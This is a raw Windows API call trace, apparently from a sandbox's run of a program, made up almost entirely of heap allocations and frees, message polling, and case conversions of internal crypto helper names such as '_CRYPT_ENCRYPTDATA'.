[0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0093.259] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0093.259] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10cae) returned 0x4516010 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10cae) returned 0x4537980 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0093.261] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0093.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0093.261] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0093.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0093.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.261] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0093.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0093.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0093.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0093.262] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.263] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.264] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.264] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0093.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0093.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0093.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0093.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0093.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0093.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0093.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 